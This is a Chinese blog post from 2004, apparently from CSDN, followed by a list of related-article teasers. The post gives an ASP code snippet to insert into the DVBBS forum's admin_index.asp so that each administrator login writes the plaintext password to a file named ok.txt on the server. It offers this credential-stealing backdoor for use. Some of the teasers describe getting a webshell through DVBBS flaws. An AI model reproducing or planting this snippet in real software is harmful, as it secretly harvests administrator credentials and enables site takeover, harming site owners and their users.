修改admin_index.asp得到明文DVBBS后台密码

原创 2004年10月15日 17:18:00

在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("ok.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing

只要管理员登陆后台,在目录下就生成了ok.txt,里面就记录了明文密码

如果一个网站后台能有机会接触到用户的明文密码,那就是流氓行为!

在早几年, 很多网站都用明文来存用户的密码, 结果被拖库了, 裤子脱了, 用户密码被泄漏, 然后就洗库、撞库, 黑产富得流油。 呵呵哒。          后来, 开发人员学学乖了, 传输和存储都不...
  • stpeace
  • stpeace
  • 2017年09月23日 21:27
  • 2472

解决DiscuzX3.3登录页面密码明文传输问题

1、UC_SERVER登录页面修改 2、DISCUZ管理中心登录页面修改
  • sxg0728
  • sxg0728
  • 2017年06月01日 10:16
  • 915

修改mysql数据库密码方式

之前在修改密码时,使用navicat for mysql工具直接在mysql-》user表中修改了root用户的密码,后来就登陆不了了。后来发现mysql用户密码不能使用明文修改,需要用passwor...
  • lxd19891010
  • lxd19891010
  • 2015年05月25日 13:42
  • 541

登录注册密文传输密码

如何保证用户登录时提交密码已经加密?
  • zhaobao1987
  • zhaobao1987
  • 2014年11月06日 18:54
  • 1480

文本方式配置weblogic连接池(明文密码属性)

对weblogic数据库连接池进行配置有两种方法:(1)通过控制台(图形界面上进行操作)     这个过程很简单,略。(2)通过文本(对config.xml进行修改)     如果你的weblogic...
  • jdbc
  • jdbc
  • 2009年09月30日 00:02
  • 2440

DVBBS 7.1 sp1有后台密码拿webshell

  不小心得到一个没有更改数据库名的bbs站点,于是下载回来,通过log得到管理员的用户名和密码,(呵呵,比起MD5破解运算,这是个好办法),进后台后,下一个目标就是得到webshell了,先在网上搜...
  • liswa
  • liswa
  • 2006年06月03日 14:27
  • 2087

敏感数据明文传输(密码)

1、  加密过程 加密分为单向和双向。拿登录功能来说,密码的加密发送。双向加密就是可逆的,这边加密,那边解密后跟数据库里的密码比对。单向是不可逆的,这边加密,那边无法解密,比对的方式是从数据库里拿出...
  • miaoca
  • miaoca
  • 2017年08月28日 15:13
  • 486

利用动网论坛dvBBS漏洞上传webshell

动网论坛一直是国内比较受欢迎的ASP论坛程序 下载数据库查看DV_upfile数据表,搜索F_ID字段得到php文件地址(前提是知道数据库地址,并且可下载,一般数据库默认地址为/data/dvbbs8...
  • Liuhuaijin
  • Liuhuaijin
  • 2017年08月20日 21:14
  • 599

CSDN爆库内幕:密码为什么明文存放?

CSDN爆库内幕:密码为什么明文存放? 近期频频暴露国内大网站明文保存用户密码的问题,也许你已经重置了大部分常用密码,但是否从此就安全了呢?溯源究底,网友shell总结了一以下几点密码需要明文存放的...
  • zouqingfang
  • zouqingfang
  • 2013年05月22日 12:38
  • 2062

Android密码明文密文切换

Android密码明文密文切换,注册的时候用的比较多。 效果动画: MainActivity package com.example.shen.passwordtest; import...
  • shenyuanqing
  • shenyuanqing
  • 2015年10月22日 15:57
  • 2280
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:修改admin_index.asp得到明文DVBBS后台密码
举报原因:
原因补充:

(最多只允许输入30个字)